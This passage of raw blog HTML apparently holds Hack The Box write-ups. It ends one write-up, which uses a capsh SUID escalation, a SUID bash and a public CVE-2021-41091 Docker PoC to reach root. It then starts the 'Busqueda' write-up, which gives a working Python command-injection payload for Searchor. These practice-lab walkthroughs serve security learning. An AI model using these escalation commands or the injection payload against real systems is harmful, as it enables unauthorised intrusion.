margin-right: auto; max-width: 595px; " > <a class="gatsby-resp-image-link" href="/static/c23710f77f6a85b72d54f57368ed8b36/54787/ssh-login-user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 126.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEEElEQVR42m1VaZfaRhDklzi7sIAOhAAdSKMbELeX9XrXTp5f/v/PqFQ3h0PIh34zoFF1TXV1q+OaPdzyA/H6b6Trv5Ct37Haf2D79gvt8Qey5ojQrBDla4yjGl07Qs95jBc31uhki1eY+oC03MJUe8yLPQLTIsy3iIotJvMlvKCCPclg+4a/G0ziBrN0yQQVZskSPv/rXwHtSYFp0vLgig9buLOSBxcaEx6epiuE2YZnCBBWGHiJglt+iuE45Wp0vTEUgMXuE0uGAL64CeJih3x5gmm+oqIE+eqVcULBiPINRrMcT1aA7v9deTjOSH8NP2qYLYMzLTAKamXoxwtl7ssVVYYNZSBgUMIjW3dW3IDuAKfJSl+WdRIv4U5LWJTC8nMmKCGyeGEDhwA2E6osYc1n+SOgHFwdfiCtDoioVdeO8WxFuko8DUNI0rJ9I2hNsEoTvzhzrfgDoM8rrY8/+cI3BRWQniNgc43nYURmleopz/qjlIUx6FFrAX0AHLFi5eKImgxMvVfthmOjrCQEQK4YZVvdS3QdSTrXUFDn34DUJaXQBcHKekuW9GK5R735jsWWsfugL9e0Dn1Kk4svRYae3iDWVQEv0RFGYu6yfUdGc0dJjZy/i9WbFkMYySpnVGcaXm4g1+576YV18htQKjlLW9php0zGZDyLK169wZdBoGzkpZgdFOc79aqcl+dCRn6P2Ek9+wJ41eqadcD9gABDz9w0FH/akxxDJtczl2diISF01VOK2ZG2S3iV6SWzrFIA0UxsJJoJc/GpMBI2UiSP5lfPcv8bcH6u8pSu99hOY+mA4Owzjy8HTBCYjV6v514qKistc7WP7O8AE2qXsKVSThYpSsyiRBxXGX0XswDCXrRL66NWOeEqxXGZODTS19U9oOVRGy+7+c6SyjkhLFZueKmiMBEdz3rmuhdmT5eOugP00w3Cghoazj5qlsmUoQ/VjxyqIfUTdjKBZJVBIhK4F2YPV65HBjUHQEWvlWQy4gFhOmDF+tRLWAqra1W1h63oDuQOcJOtsWGX7DnzWjKKqaU/Z7VldF0q6zNkMEjo4GV1ZQr997oKOGEH+O0JbnNAjwAW554b0B5TqXgJh8zVk9RtqDomyrzvnluu58xvg0QBm9U7qsUJMbUMOHlMeVD3x/le9SvZglLtQLVk0nGFL47BH67B8+icwB5FsL1YvyudtDyi4uiKs50auiB4RDvkzSvZlUiYQGSQHq74CfCKE3x+Hf32T1jcy4crDQMkQaCgnax+pQ93NHbFL94Oy+0nX3xjfEPBitebd3pxz5DEJ8zyrzDrX3DZisJIh7CdaHTPxj4gYeN7swYxmZVkOGeCmtNHWjEjU2Enw0GuH/FGpv3EiJNeJvvLbSaeNfwH5EIu552IepgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ssh login user flag" title="" src="/static/c23710f77f6a85b72d54f57368ed8b36/54787/ssh-login-user-flag.png" srcset="/static/c23710f77f6a85b72d54f57368ed8b36/dda05/ssh-login-user-flag.png 158w, /static/c23710f77f6a85b72d54f57368ed8b36/679a3/ssh-login-user-flag.png 315w, /static/c23710f77f6a85b72d54f57368ed8b36/54787/ssh-login-user-flag.png 595w" sizes="(max-width: 595px) 100vw, 595px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Upon logging in, the user flag can be found here (<code class="language-text">/home/marcus</code>). There was also a mail notification, so I went to <code class="language-text">/var/mail</code> and found the following email:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a237ea26f05f9c8eed29183260b0863/76a04/mail.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 92.40506329113923%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAACxElEQVR42o1UWXajMBDkKEkcO453jACxg8HGW2xnmfsfpaeqMfPmY5Z89JPUiFZVdUnOrHmT2flDRtuTjOqDjOxRXoIPWaVXmZtcBlMrg1koz1NG8N9wgt1NwvOX+Pt3Wddn8etPmac/ZJWcxYu3sgxqGc4jeZp8r6hj0r3Em4uUu3dJNm9StJ9i85Ms/Q0K7lBwI260lVVYy8wrka9kbWugL/5ckJsm61weXwN5GPvy8GLkEWMfT8gPgI4IH+/zIWQYzv6C0PULMRYoggooNmKSVlzbILayjhi7+7oB4lbzc69QhDMAWZhS58sAwNxEHNKy2V7CpBETFOIne/EpQ/WmxYPsIAaFTLKTMD9qbgE5FqbSYl2goI/CXo6mZEdod5V8Cw2Lg8T5Xqr9l+TNTdL6Ck0/pNjeJGuuEpVnPYj5mHNECt3j8og4SZC24kzcXE+klnOcNnWz7lSIPwM1jqS7QHPGyxTaRRqj+6h6QrvhNNRwDChmODFBp21x6kZQI8KeOnN0QITvZJI378if73lERaRnINxBQzQiLUE1g17wXU+FepGiHoKiBQpxzhwpEwT3UOM1/gvRBxM3QBi14kP0EPxd3AwvrMREjW6k9+hTsgh13eUDzbXqU8pFdyzhEnbboRXi6qInKpriiK63kkBortP6pvR7xDGpl6c7zUvXJIxZ00nlLP1aMnTZotsZfmZxC7Q2P2hB1RARYh2qIy6/6MaaJ21YDbYyQKwFudGPQQP03XCrH0mLlLyk7cwOumwSCzA8GJ6e5ZxOWNwd4ni2VQQ50RVoQtY1gb6yWLOrpMOi1JCPRX+D9J7zBmGt37F2pqtcXb8C0uEkkudX+GlicS+t3tvnaec3zvu73Yfed45cjw1yftdlDzT5utCkLDhA6KPw2898HAb/jEDDIdUIz9UadEbTDmFfdDD5buCluRf8CY1WVUGJqlzDAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="mail" title="" src="/static/1a237ea26f05f9c8eed29183260b0863/50637/mail.png" srcset="/static/1a237ea26f05f9c8eed29183260b0863/dda05/mail.png 158w, /static/1a237ea26f05f9c8eed29183260b0863/679a3/mail.png 315w, /static/1a237ea26f05f9c8eed29183260b0863/50637/mail.png 630w, /static/1a237ea26f05f9c8eed29183260b0863/76a04/mail.png 711w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The message above notes a few vulnerabilities to be aware of. The final one listed jumped out at me as a good path to try and get a root shell (CVE-2021-41091), as it consists of exploiting Docker's overlay file system to traverse the data directory contents and execute programs with extended permissions within a container to escalate privileges on the host system.</p> <p>There's a PoC for CVE-2021-41091 <a href="https://github.com/UncleJ4ck/CVE-2021-41091" target="_blank">here</a>. As stated on the PoC GitHub page, root access needs to be obtained on the Docker container in order to run the exploit. So I enumerated the system with LinPEAS to try and find a way to escalate privileges:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0f76d25d82bf250e14632225067395d9/ad007/linpeas-suid.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB5klEQVR42jWR2Y6bQBBF+Y9EkcfQ4AWzNKvZMWDjzOJMJtFEkfJn+deTwqM8HFVXd/XtW9WGCkZUeL5jBQsTpnfC9E8f0esxgxlV3nDaF5zmhl0/ofIXqZHaQGqCQdbD/Y7xIXZB6RknuWBH8oCuUcF/KjnvsI9X7OwsSE16vmMdSsxthrXLsfbFHWOd3Fjnb5jVb1T/E0tetto3LHFktz+w6lfM8hV1+oXZvAtS075jj39YF995CGdW0RMrt2S1SzF090zYv7AvZ7zqkSC/EAq6uLIJWrx0Ii6vhOJOHyc5P7ENayw7wd2keLtMyPG2KYdNgjHohlkKusORISiZJL9GDc9xS+PmjNL+nPaMSU8f1fRuQmEHVOaB8WFPaHkEQqx8tBNhlO0TlRBlI7m4LJtHasnb0w1ft+TVlW64UUreFCPtNsJTIdry6dYHchFeBD/JI58dLYLS8kKUTWRyuRCxhUrGEOUTx/orxekbt2Hi72zzttuxVzGJHXI0PYpFdO3iSfQlN7q4Z45aOr+kFkdnaXmMOoktY9hQxh1RcSGXH2/NgO0mxlUB9YMrYj6F7DVCpiJcW1qOj2dxcuYgAmEy3Nda3C77WsagxWUqo1g+xNunOEpjO6lcFjbZHU9yRz7oi635BzHkJj6Mniu8AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="linpeas SUID" title="" src="/static/0f76d25d82bf250e14632225067395d9/50637/linpeas-suid.png" srcset="/static/0f76d25d82bf250e14632225067395d9/dda05/linpeas-suid.png 158w, /static/0f76d25d82bf250e14632225067395d9/679a3/linpeas-suid.png 315w, /static/0f76d25d82bf250e14632225067395d9/50637/linpeas-suid.png 630w, /static/0f76d25d82bf250e14632225067395d9/ad007/linpeas-suid.png 681w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The results showed that the <code class="language-text">/sbin/capsh</code> SUID binary was worth looking into. I checked <a href="https://gtfobins.github.io/" target="_blank">GTFOBins</a> and found that running <code class="language-text">./capsh --gid=0 --uid=0 --</code> should escalate privileges to <code class="language-text">root</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b489cb2fa148d0992052dfb95d8a8d63/832a9/gtfobins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4ElEQVR42q2Q2XKDMAxF8//fCDZQY/BCoAOBeONWdtvQPvStzJzR+AJHlm7eOwghkFLCfzy3LGzbFkYbWGuhlIadJmhN1eZswjiOGJWCMaZkhr6biPl+L9lz3y+hcw6cMXDOwFiNuq6pMjS8QVVV4E0DxjkY5X3XleY5E4R866iZgjuOSxhCKN0H9XmLjCK00ZCDpPMARbfNSDkURN9jeV+wk2hdVxxPdwlxngjzjEBjxnmB/6pp23DSD5mUobF+nkGTvYjxtzCSMNJOYpbRXk7qiscDyLv5i+/3G1XvX8IPTQXMvuSZIAEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GTFOBins" title="" src="/static/b489cb2fa148d0992052dfb95d8a8d63/50637/gtfobins.png" srcset="/static/b489cb2fa148d0992052dfb95d8a8d63/dda05/gtfobins.png 158w, /static/b489cb2fa148d0992052dfb95d8a8d63/679a3/gtfobins.png 315w, /static/b489cb2fa148d0992052dfb95d8a8d63/50637/gtfobins.png 630w, /static/b489cb2fa148d0992052dfb95d8a8d63/fddb0/gtfobins.png 945w, /static/b489cb2fa148d0992052dfb95d8a8d63/832a9/gtfobins.png 1008w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Within <code class="language-text">/sbin</code> I ran the command <code class="language-text">./capsh --gid=0 --uid=0 --</code> which escalated to <code class="language-text">root</code> within the Docker container:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 488px; " > <a class="gatsby-resp-image-link" href="/static/89fb3c1c5710252e192bab1f7f7e6d11/e3644/docker-root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4UlEQVR42n2P0W6DMAxF+y0DuhQopU1JCCSQAhm06oY0af//KXcmSGu3hz0c2bKsY9+Nae9o7TuMnVFWE87yDUrfINSI/NxD0kzpK9URgvqMX8Clw7Ho8bItPMGrQMikZ9OQcHCfMJcZqr6S0KGsJ0g14VQMXhxnNQrlcOAWad5C0l6aN3Swo/mEJDMP4Th9QZsbTmKA7WaS9ODCoW7uyOmbeK+xjUskh7WytCKBRrRbe5bWvv8R2u4Dyb5CEHGE9L6HIgRLlCfWaA9CJjzPcb1wlygvi2hpYZH9C/uL/CX8BhFLn1jcwupzAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="docker root" title="" src="/static/89fb3c1c5710252e192bab1f7f7e6d11/e3644/docker-root.png" srcset="/static/89fb3c1c5710252e192bab1f7f7e6d11/dda05/docker-root.png 158w, /static/89fb3c1c5710252e192bab1f7f7e6d11/679a3/docker-root.png 315w, /static/89fb3c1c5710252e192bab1f7f7e6d11/e3644/docker-root.png 488w" sizes="(max-width: 488px) 100vw, 488px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The next step of the exploit was to set the SUID bit on <code class="language-text">/bin/bash</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 467px; " > <a class="gatsby-resp-image-link" href="/static/d2eb8f749e1f8e56a7bb44641def64dd/78b87/chmod-bin-bash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.822784810126581%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAq0lEQVR42j1OWxKCQAzjLCK7gDwGhX2x8hAVUUc9gPe/Riz98COTNOmkDQ5qgu/uUOYC2y4Ypg+68YWqnhBGNULR/LERNMsG21gxhysLRT5pqcjXCIyb4Y93NPoMba9c7Psn8rJDrS9UfIJyN9bKzij2PbKqh/ULysPImfEP8gcuDd6fL/LCQyQaMlGI6HK8c4wkc5CpZb1ykrW0ZyBSwxlz7pDmLSTtrB/+AMvyYE0C12HnAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="chmod u+s /bin/bash" title="" src="/static/d2eb8f749e1f8e56a7bb44641def64dd/78b87/chmod-bin-bash.png" srcset="/static/d2eb8f749e1f8e56a7bb44641def64dd/dda05/chmod-bin-bash.png 158w, /static/d2eb8f749e1f8e56a7bb44641def64dd/679a3/chmod-bin-bash.png 315w, /static/d2eb8f749e1f8e56a7bb44641def64dd/78b87/chmod-bin-bash.png 467w" sizes="(max-width: 467px) 100vw, 467px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I downloaded the exploit script onto the host system and executed it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/938e56976ece73c82217a26ad49567ef/6f406/run-exp.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 65.82278481012659%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACNklEQVR42oVT23abQAzkT9o0rmNsbMxtuWMwGHxve9Imp/3//5iOhMlrHuZoF3ZHo5HWstsLnJ9/4NxesTxeYddv8HbvyPcX+FkP2ysxcxJ8s0PF0yL8WE94XkaK2crACrIBeXtHdfgFU56Q7K4ouBdE+RFu3GFj9tjGLbFHVPSMDYK0hZ92cE2NdVjBCUoltVzTQhCkPQ8clMBPDvCSThHkg35P6yvPHBBXJ5IOXHe69pI9HL+EE5Z42aSwtrwkF6LiqKSi2Gc05ZEKB9jbEktPUGHhFlhschJU3OdYkUggCtfhDsttDitMWtTdHSmzCXFIEoGUL4SiUJPRT29KLmcyib2qNYJyYKUNLJ/eFM0Zrl/ghaauNLt4slNsoobYU0HDfa37dVgrNvKfytbBQ6FX0EN6Jo0QRX5UweWh4KFSvBRl0hCxQpSuSSoJxQrbzRUrEk2wMprd3/5iuP9Df3nDrvuB/vqOZnglYQdTnZE1NySMIbseFSdNHsueyaTcdHfW6NM+y2Epkt1LRzWynjz09Zt4dKThpTZFlT0g+7FhjFtpWMY55GylFbNUR4RUJOXFzCjlTt0VL8VD8VJGzOM/14y+ynlphqjb0Fcro/T+/JudviHOWuQkzuvLR2dFqZBMjRCMJNOwj0RuVOs8WlvD4U0HenTRl2E4DiFfgYyEKU5K7D2UjySdKtbB13WN+TrFnM/zO2F5MS/mJyWUS8+2wZeZh6d5wHcb4au+XfM5loZPz+A/8BGu+r/Q4TcAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="./exp.sh" title="" src="/static/938e56976ece73c82217a26ad49567ef/50637/run-exp.png" srcset="/static/938e56976ece73c82217a26ad49567ef/dda05/run-exp.png 158w, /static/938e56976ece73c82217a26ad49567ef/679a3/run-exp.png 315w, /static/938e56976ece73c82217a26ad49567ef/50637/run-exp.png 630w, /static/938e56976ece73c82217a26ad49567ef/6f406/run-exp.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The exploit was successful and provided a current vulnerable path, so I went to that directory and ran <code class="language-text">./bin/bash -p</code> to get a root shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/55601edf398028232b231667d2ab4e2d/76a04/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.88607594936709%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAxklEQVR42n3M206DQBSFYV7FItGpHGqBGY7ShoRjJY1YTS/q+7/F76bc9+LLWnvPZFvBYURPv8TjN2E7EdY/6GrGVBNpPaMPZ1zd4plO9HjJwC7/JEhHsfQTvmSQDfLeYLnVBa+54Td/uPWVl+yCk91Q+RW/OBOUM6/6xGbX8rR478QgXTJoJPu13+caqzh+Eac9kdibFuctZ6MSbKV5VrHM+s6WbqvogVD+R1hJOWCKDlN2uPsPnO16zFZGDovtyl72D5m7f2D5gfRK4QQRAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/55601edf398028232b231667d2ab4e2d/50637/root.png" srcset="/static/55601edf398028232b231667d2ab4e2d/dda05/root.png 158w, /static/55601edf398028232b231667d2ab4e2d/679a3/root.png 315w, /static/55601edf398028232b231667d2ab4e2d/50637/root.png 630w, /static/55601edf398028232b231667d2ab4e2d/76a04/root.png 711w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-busqueda/https://mgarrity.com/hack-the-box-busqueda/Thu, 29 Jun 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4e1e4e13eb986706a2b29408645c9d54/3b67f/busqueda.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAElEQVR42mMQkdX+jxPLAbGM9n9BCS0wDebL4scMuCREgZoFQAYBaRldnf8i8iA+RJxkA0GaBCW1/quaGvxPabb/Xz3J4X9Koy2YDxLHZyhWA4WB3hNX1v7vG23xPycu6v+ppZP/1+Uk/Q9KsvkvpggJBuINBLkO6DUFI83/GekR/1si6v+/2T///+S8nv+R4X7/FQy0/wtJ4vY6Di/r/ueTVPrfNCPn/+d31/4vPNT2/9mFLf+rJqb/5xVXAsuTEYZAV+pp/y+aGP0/a0Xo/5yuoP8qxnrgGCc5DJEN5RdX+S+nrvGfX1INHOtkxTKyoWLyuv+FZHSAtA5Bw0AGAgAJ9gxaH0mTIAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="busqueda" title="" src="/static/4e1e4e13eb986706a2b29408645c9d54/50637/busqueda.png" srcset="/static/4e1e4e13eb986706a2b29408645c9d54/dda05/busqueda.png 158w, /static/4e1e4e13eb986706a2b29408645c9d54/679a3/busqueda.png 315w, /static/4e1e4e13eb986706a2b29408645c9d54/50637/busqueda.png 630w, /static/4e1e4e13eb986706a2b29408645c9d54/fddb0/busqueda.png 945w, /static/4e1e4e13eb986706a2b29408645c9d54/3b67f/busqueda.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Busqueda is a Linux machine featuring a web application that provides users with a URL for a variety of search engines across the web with an appended query based on an input value. The functionality is implemented using a Python library called Searchor. However, this library has a command injection vulnerability that can be exploited.</p> <p>By leveraging the command injection vulnerability, a shell on the system as the user <code class="language-text">svc</code> can be obtained. Through enumeration, it is discovered that the <code class="language-text">svc</code> user has sudo permissions to execute a script located at <code class="language-text">/opt/scripts/system-checkup.py</code>. This script allows for the inspection of a Docker container that contains Gitea credentials for the <code class="language-text">administrator</code> user.</p> <p>Further analysis of the code in <code class="language-text">system-checkup.py</code> on the <code class="language-text">administrator</code> Gitea page reveals that it calls a shell script using its relative path. This presents an opportunity for exploitation by creating a custom shell script with the same name within a folder where the <code class="language-text">svc</code> user has write permissions. This can ultimately lead to a root shell on the system.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/16c5448859ede2c364ad5c42bc1b21b0/31682/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 52.53164556962025%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7UlEQVR42n1TyZbaMBD0p5ABhsUrluVV3rEBA8NkQg75/w+plMxySHhzqGfRT6qurmqMqThiKs548zpYskTRnFDUA7rhN6rdL6T1Ce9Oih9Liek6+h5mBEMWJ4T5EUHWw4tqiLhBXu5uxP0XRNqx3iIqB557WKKEK5uxNjfj/0gNVQ1I1Q5Nd0FeHZHmByo8Q0QNnKDiwy1E0iEg2buV4G0V3sDHWvUDj7oR8WJeX6CItPpAUp6xHf5Axi1MJ4Lj53CFghsUWNoxVl4+qlxvcpibYvzq3yueF04GI6suqLorivaTilpsoh66ieToWlWo9vBkhaTYw/ZSLEwJ2ychidea8N5ANxoJI3WEaj7R7BhCf6VSnrda5RUlQ8m3F0iSZmPDGpOpjcnMGcd7OXJWXqBVyuyAmAGJuKeShN1SLB2FOX2b0fzJIrgnySCWggheJm1oRTVHzuhfXJw5+k8Iro/lK5IqXopHkpmZPB/NXqT7JBT0zCeCZAeZ7uFToUk/bDfhN6PxCrYoiBK2rOEQusEz7X9ghOkBmtSTW6qq4YUdG3DJfa4M18YhocukLQbibLIRFmte2DCMavRV7+Um7mDzvlG2X4iygWoq+ndTqMl02jZT92TLekdlzfjADUr4tGS+5j+HimZ3jx9e/wXjB2YmLhTm2wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap-scan" title="" src="/static/16c5448859ede2c364ad5c42bc1b21b0/50637/nmap-scan.png" srcset="/static/16c5448859ede2c364ad5c42bc1b21b0/dda05/nmap-scan.png 158w, /static/16c5448859ede2c364ad5c42bc1b21b0/679a3/nmap-scan.png 315w, /static/16c5448859ede2c364ad5c42bc1b21b0/50637/nmap-scan.png 630w, /static/16c5448859ede2c364ad5c42bc1b21b0/31682/nmap-scan.png 670w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>80 (HTTP)</li> </ul> <p>Visiting the IP redirected to <code class="language-text">searcher.htb</code>, so I added that to <code class="language-text">/etc/hosts</code>.</p> <p>On the webpage, users can choose from a variety of search engines and enter a query to be searched. This will generate and output the URL for the particular search engine with the appended query. Ticking the "Auto redirect" box will automatically send the user to the URL.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a89a740bff9b519c966697c6dff59405/f3baa/visit-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 94.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1UlEQVR42pVUB3LjMAzU/3+Rj+QJ94NMMrZ6pRz1toeFTDkeS8odNBiSELnkojnzPONIl2VB07YIwxBRFKPrOrWdnXEgwk1HOgwD8ryAKQzGcTzdS1HAaZr0YE/t+3XeP+b8TzC7Hn7ss/oESDqfn1/wfB9JkiJOEqVpqarGMXw/QJqmYo8QiEZRhFjsXNd18wDMsgye5+tPYwzyopCDmR7Oshyp/OceUqedtizPZZ2r3ZhSWWyAntzsuh5cz8P16qpyfXVdtfnycs7JYF0HqnyEKxrKSxmwDbCqKvRdjzOxPtqzvQSlEIpBEMKUpcwNyvvIwOxmAW38tjselylgebupY+l8jup0XmCYKgP+RxSQjr5c7z4S33GkfwgaMNLxGulEghTFj0vtAxgsptUGSKp0LKOq/pQco5OttqKsGM6bpkXb3u3b2D4DWhkl9Dxsf/4myxFlGyEmJyndvr/RySsn1idr90DXc8sroBVSJf2qrpXiGSCB3v4A7x/r2XnZASRVArI2/0UuBkjqZ/rOXsewLcqO0zhpab3ufe04zlErsoD0603ytK4rZfCzV+6pc0RH2xJbFFOIKSNKHzNFzlzi/FLAmKWjdJKjTRBgkAzAspxWyl+rIssH0lUJ2wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visit webpage" title="" src="/static/a89a740bff9b519c966697c6dff59405/50637/visit-webpage.png" srcset="/static/a89a740bff9b519c966697c6dff59405/dda05/visit-webpage.png 158w, /static/a89a740bff9b519c966697c6dff59405/679a3/visit-webpage.png 315w, /static/a89a740bff9b519c966697c6dff59405/50637/visit-webpage.png 630w, /static/a89a740bff9b519c966697c6dff59405/fddb0/visit-webpage.png 945w, /static/a89a740bff9b519c966697c6dff59405/f46b1/visit-webpage.png 1260w, /static/a89a740bff9b519c966697c6dff59405/f3baa/visit-webpage.png 1280w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The bottom of the webpage shows that it's built with Flask and Searchor 2.4.0. A google search for "searchor 2.4.0" led to <a href="https://security.snyk.io/vuln/SNYK-PYTHON-SEARCHOR-3166303" target="_blank">this snyk Vulnerability DB page</a> stating that the Searchor package is vulnerable to arbitrary code execution.</p> <p>So, I tested some payloads, and was able to get successful command execution with the following:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">'+exec("import os; os.system('id')"))#</code></pre></div> <p>The payload uses the <code class="language-text">exec()</code> function to execute python code as a string within the current execution environment. As for the argument within <code class="language-text">exec()</code>, <code class="language-text">import os;</code> will import the python <code class="language-text">os</code> module to provide a way to interact with the operating system. Then, <code class="language-text">os.system('id')</code> is used to execute system commands and aims to execute the <code class="language-text">id</code> command on the underlying operating system:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c83691cb86be8fb9ee53a71736db7d61/9efac/command-execution-payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: 